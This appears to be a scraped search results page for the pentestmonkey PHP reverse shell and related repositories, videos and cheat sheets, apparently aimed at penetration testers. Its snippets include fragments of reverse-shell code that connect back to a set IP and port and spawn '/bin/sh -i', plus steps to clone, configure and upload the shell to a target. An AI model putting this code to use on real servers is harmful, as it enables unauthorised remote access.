GitHub
github.com › pentestmonkey › php-reverse-shell
GitHub - pentestmonkey/php-reverse-shell · GitHub
Contribute to pentestmonkey/php-reverse-shell development by creating an account on GitHub.
Starred by 2.8K users
Forked by 1.9K users
Languages PHP
GitHub
raw.githubusercontent.com › pentestmonkey › php-reverse-shell › master › php-reverse-shell.php
PentestMonkey php-reverse-shell - GitHub
// Open reverse connection $sock = fsockopen($ip, $port, $errno, $errstr, 30); if (!$sock) { printit("$errstr ($errno)"); exit(1); } // Spawn shell process $descriptorspec = array( 0 => array("pipe", "r"), // stdin is a pipe that the child will read from 1 => array("pipe", "w"), // stdout is a pipe that the child will write to 2 => array("pipe", "w") // stderr is a pipe that the child will write to );
Videos
How to get a stable reverse shell through vulnerable FTP ...
02:51
Reverse Shell Using WordPress Admin Panel | One Liner PHP Code ...
08:23
Let’s Hack with a Reverse Shell! - YouTube
05:36
[ENGLISH] How to get stable reverse shell through PHP Pentest-Monkey ...
10:03
Reverse shell Using WordPress Admin Panel | Pentest Moneky | ...
GitHub
github.com › ivan-sincek › php-reverse-shell
GitHub - ivan-sincek/php-reverse-shell: PHP shells that work on Linux OS, macOS, and Windows OS. · GitHub
Starred by 530 users
Forked by 153 users
Languages PHP
GitHub
github.com › pentestmonkey › php-reverse-shell › blob › master › php-reverse-shell.php
php-reverse-shell/php-reverse-shell.php at master · pentestmonkey/php-reverse-shell
Contribute to pentestmonkey/php-reverse-shell development by creating an account on GitHub.
Author pentestmonkey
Pentestmonkey
pentestmonkey.net › tools › web-shells › php-reverse-shell
php-reverse-shell | pentestmonkey
Update 2011-11: Imax sent me a link to his tool fimap which uses php-reverse-shell.
GitHub
github.com › pentestmonkey › php-reverse-shell › tree › 8aa37ebe03d896b432c4b4469028e2bed75785f1
GitHub - pentestmonkey/php-reverse-shell at 8aa37ebe03d896b432c4b4469028e2bed75785f1 · GitHub
Starred by 2.7K users
Forked by 1.9K users
Languages PHP
D3adshoth8ck
d3adshoth8ck.github.io › 2025 › 06 › 27 › pentestmonkey-reverse-shell.html
The Legendary PHP Reverse Shell by Pentestmonkey
Huge respect to Pentestmonkey — pentestmonkey.net — for sharing this script with the community. It’s pure gold. ```php <?php // php-reverse-shell - A Reverse Shell implementation in PHP // Copyright (C) 2007 pentestmonkey@pentestmonkey.net // …
Github
n0a110w.github.io › notes › security-stuff › shells › php.html
php - n0a110w.github.io
# download the repository git clone https://github.com/pentestmonkey/php-reverse-shell.git # modify the source so it uses a listener's IP of choice cd php-reverse-shell sed -i 's/127.0.0.1/IPADDR/' php-reverse-shell.php # now the file is ready to be uploaded/downloaded onto the target # one ...
GitHub
github.com › pentestmonkey › php-reverse-shell
php-reverse-shell/ at master · pentestmonkey/php-reverse-shell
Contribute to pentestmonkey/php-reverse-shell development by creating an account on GitHub.
Author pentestmonkey
GitHub
github.com › jivoi › pentest › blob › master › shell › rshell.php
pentest/shell/rshell.php at master · jivoi/pentest
// See http://pentestmonkey.net/tools/php-reverse-shell if you get stuck. · set_time_limit (0); $VERSION = "1.0"; $ip = '192.168.56.1'; // CHANGE THIS · $port = 443; // CHANGE THIS · $chunk_size = 1400; $write_a = null; $error_a = null; $shell = 'uname -a; w; id; /bin/sh -i'; $daemon = 0; $debug = 0; ·
Author jivoi
GitHub
github.com › acole76 › pentestmonkey-cheatsheets › blob › master › shells.md
pentestmonkey-cheatsheets/shells.md at master · acole76/pentestmonkey-cheatsheets
One of the simplest forms of reverse shell is an xterm session. The following command should be run on the server.
Author acole76